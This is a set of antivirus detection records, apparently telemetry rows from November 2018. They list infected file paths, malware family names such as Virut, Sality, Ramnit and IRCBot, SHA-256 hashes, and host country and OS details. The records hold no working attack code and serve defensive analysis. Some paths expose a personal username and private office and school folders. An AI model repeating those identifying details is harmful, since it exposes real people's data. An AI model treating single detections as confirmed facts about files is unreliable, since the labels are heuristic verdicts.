  Row(detection=Row(filename='avscan-20181101-151618-47df8de4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151618-47DF8DE4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\USERS\\X\\APPDATA\\ROAMING\\MICROSOFT\\WINDOWS\\THEMES\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T15:30:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101721-69e66da5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a7983e27\\AVSCAN-20181101-101608-5FB892DB\\AVSCAN-20181101-101721-69E66DA5', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d8cf028d5f2891f0ed68774e201f057ae589aeadcc041a21bdf72776b4b8a9de', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:17:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150150-a17312ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150150-A17312CA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150439-ca23e4c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150439-CA23E4C1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:04:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152400-4cd95dd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152400-4CD95DD1', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hadria hanane.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\HADRIA HANANE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:16:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='G:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3080'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='orientamento.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\ORIENTAMENTO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='htccalc.exe', filepath='C:\\Program Files (x86)\\Boxs Cracked 2015-2016\\AutoPlay\\Docs\\Volcano Tool\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='dc89f8c174ad6632efaa2e672615d4c58372509964e57216b49356c82c73e1b5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bFA5OFbPj0WeUpFq.1', country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:22:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095322-653f26fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095322-653F26FB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:53:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unwise.exe', filepath='D:\\$RECYCLE.BIN\\S-1-5-21-1051811136-422598195-4085909905-1001\\$RSS3NPR\\UNWISE.EXE', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='f20454541b64414100fc91585ee2d00f8bfd1f3993979c08c781a7db43d69bd7', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:49:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ecdl.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:23:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ebc3c31328d3e062a4cae121b7ff8441a9beefe61fefaddd01a462789bb5fcb4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0017280.exe', filepath='\\\\?\\E:\\System Volume Information\\_restore{4BC09F2B-3D9F-48B4-B911-965A060CD3E4}\\RP16\\A0017280.exe', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='dc98eb1cf31a502efc1c4c57b8847979507ada3942546c77ff4aa849bf2e72c1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:22:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213247-3c1869a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213247-3C1869A5', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:33:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3mnufzljt0n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:01:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b41aa7556e724573dd6a0c00baa019aaa68a97f9ccf0fdfe70e358418fc9b263', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-19.categorizing\\B41AA7556E724573DD6A0C00BAA019AAA68A97F9CCF0FDFE70E358418FC9B263', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b41aa7556e724573dd6a0c00baa019aaa68a97f9ccf0fdfe70e358418fc9b263', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:43:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093828-b9d0439e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093828-B9D0439E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='incontro 15 aprile.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\INCONTRO 15 APRILE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f0ec71084def331a71b7479b43aa68bcbdbe55b85a3e30e58dcd3cdde63a926b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F0EC71084DEF331A71B7479B43AA68BCBDBE55B85A3E30E58DCD3CDDE63A926B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f0ec71084def331a71b7479b43aa68bcbdbe55b85a3e30e58dcd3cdde63a926b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9610323\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:19:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003486.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003486.exe', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='4f248fa013057f9ee36069839b0cc0eead7d419db45ef8b37ba361cfe8e3d0e4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa2888.37161\\Reset Epson Serie L\\Todos os Resets\\Epson Adjustment Program Resetter L350-L355-L550-L555-L110-L210-L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\Todos os Reset Epson Serie L.rar\\\\\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1525192, timestamp='2018-11-04T17:34:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T09:23:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-14-05.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-03T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T14:46:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ospprearm.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE', filesize=92000, name='W32/Sality.AG.#M1.#R1'), hash='022e23c59a7b448781aabfd47e46e984d863431e9bef460e3a0bc55daacda537', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T12:34:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='F:\\3asef4\\System\\Windows 10 Manager 2.2.4\\Keygen_URET\\YAMICSOFT_AIO_5IN1_V2.4_KEYGEN_URET.EXE', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T19:40:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:32:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='termo de levantamento de penhora.doc', filepath='E:\\arquivos do cartório\\MEUS DOCUMENTOS\\TERMO DE LEVANTAMENTO DE PENHORA.doc', filesize=64000, name='HEUR/Macro.Downloader.APG.Gen.#M1.#R1'), hash='64d3a042cf29d9649d56b2f1aa18067cd10406a4e3e37d5cf12426160897e247', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T20:06:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-10-30-56.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-31T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T10:51:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T10:56:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T16:11:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T09:29:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ec45', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ec45', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131455-27ebd21e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131455-27EBD21E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T08:33:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131007-121fa7ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131007-121FA7FF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230024-05227ce9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-230024-05227CE9', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:00:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240e9', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240e9', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:43:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150841-996bcec9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d880bdd\\AVSCAN-20181104-150815-955359CA\\AVSCAN-20181104-150841-996BCEC9', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:08:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111517-31d64209', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9c11e59\\AVSCAN-20181104-110723-F3656EEC\\AVSCAN-20181104-111517-31D64209', filesize=1020000, name='PUA/Fusion.#M1.#R1'), hash='a3948a22c1a4e6d2f733e61ba3bd9410297b6b1c7625d3138d51e87d9ed93a4e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:45:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3fafbd95a0d63ca588eb3a76deaa41c632bde63df9db5663a7f66b534e58c369', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:50:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222430-90cd3a96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6931b99d\\AVSCAN-20181104-221652-2BB38B21\\AVSCAN-20181104-222430-90CD3A96', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:24:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:55:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unrar.exe', filepath='C:\\Program Files (x86)\\WinRAR\\UnRAR.exe', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcc3555eefbf65872e526e7e8f2dc64b978d243a1617b85544c3c15183278e2e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:qWtOV8FBikKovod9.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:32:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:43:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d690', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d690', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000904e', filepath='C:\\Windows\\Temp\\962baaef-7c68-4139-96a5-cf3967f6676d\\tmp00000308\\tmp0000904e', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='45cc0b31e628760cd0625bb0a661d72cdfe416405dd3ad0bdd1fe648e2ed74e7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T14:20:06Z'), dt=datetime.date(2018, 11, 4)),
